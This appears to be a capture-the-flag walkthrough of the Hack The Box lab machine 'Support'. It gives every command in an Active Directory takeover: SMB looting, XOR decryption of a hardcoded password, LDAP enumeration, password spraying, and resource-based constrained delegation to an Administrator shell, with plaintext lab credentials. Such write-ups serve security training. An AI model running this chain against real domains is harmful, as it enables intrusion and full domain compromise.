Port scanning
Copy sudo nmap -sV -sT -sC -oA nmap_initial 10.10.11.174
Output:
Copy Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-17 21:32 WIB
Nmap scan report for support.htb (10.10.11.174)
Host is up (0.023s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-17 14:32:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-07-17T14:32:52
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.55 seconds
Enumerate SMB
Copy smbclient -L 10.10.11.174 --no-pass
And then, download all files from support-tools.
Copy smbclient '//10.10.11.174/support-tools' -N -c 'prompt OFF;recurse ON;mget *'
Now, we will extract the password from UserInfo . There are two options to get the password: static analysis and dynamic analysis.
Dynamic Analysis
Try to run UserInfo.exe, before that, run tcpdump to check if there is any requests from the app.
Copy mono UserInfo.exe find -first ''
Check at tcpdump.
After confirmed that the UserInfo send connection to the server, analyze the traffic with Wireshark.
Got credentials:
Copy support\ldap : nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
Static Analysis
Use AvaloniaILSpy do decompile the program.
We found the encrypted password and the key. Use python script to decrypt the key.
Copy #! /usr/bin/env python3
import base64
def get_password ():
encoded_string = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = b "armando"
array = base64 . b64decode (encoded_string)
array2 = bytearray (array)
for i in range ( len (array)):
array2 [ i ] = (array [ i ] ^ key [ i % len (key)] ^ 0x DF )
return array2 . decode ( "utf-8" )
password = get_password ()
print (password)
LDAP Enumeration
Enumerate all information using ldapsearch.
Query all username:
Copy ldapsearch -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
-b 'DC=support,DC=htb' "(objectClass=person)" | \
grep "sAMAccountName:" | sed 's/sAMAccountName: //g'
Query all distinguished name.
Copy ldapsearch -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'DC=support,DC=htb' "(objectClass=person)" | grep "dn:"
Enumerate all information at dn support.
Copy ldapsearch -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=support,CN=Users,DC=support,DC=htb"
We found a credential at support info.
Found creds:
Copy Ironside47pleasure40Watchful
Next, spray the password to other account.
Copy crackmapexec winrm 10.10.11.174 -u users.txt -p 'Ironside47pleasure40Watchful' --continue-on-success
Get Low User
Copy evil-winrm -i support.htb -u support -p Ironside47pleasure40Watchful
Privilege Escalation
After googling, i found useful article here:
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution
https://learn.microsoft.com/en-us/windows-server/security/kerberos/kerberos-constrained-delegation-overview
https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
First, we need to add computer to domain with Impacket.
Copy impacket-addcomputer 'support.htb/support:Ironside47pleasure40Watchful' -computer-name 'ayanami' -computer-pass 'ayanami'
Then, import PowerView on target system.
Copy Import-Module .\PowerView.ps1
Get-DomainComputer
Get-DomainComputer ayanami
Now, edit the target's "rbcd" attribute
Copy impacket-rbcd -delegate-to 'DC$' -dc-ip 10.10.11.174 -action 'read' 'support.htb/support:Ironside47pleasure40Watchful'
impacket-rbcd -delegate-from 'ayanami$' -delegate-to 'DC$' -dc-ip 10.10.11.174 -action 'write' 'support.htb/support:Ironside47pleasure40Watchful'
Now, obtain a ticket (delegation operation)
Copy impacket-getST -spn 'cifs/dc.support.htb' -impersonate Administrator -dc-ip 10.10.11.174 'support.htb/ayanami$:ayanami'
Get shell as Administrator.
Copy KRB5CCNAME = administrator.ccache impacket-psexec -dc-ip 10.10.11.174 -no-pass -k support.htb/administrator@dc.support.htb
Tools Used
Tools used in this machine.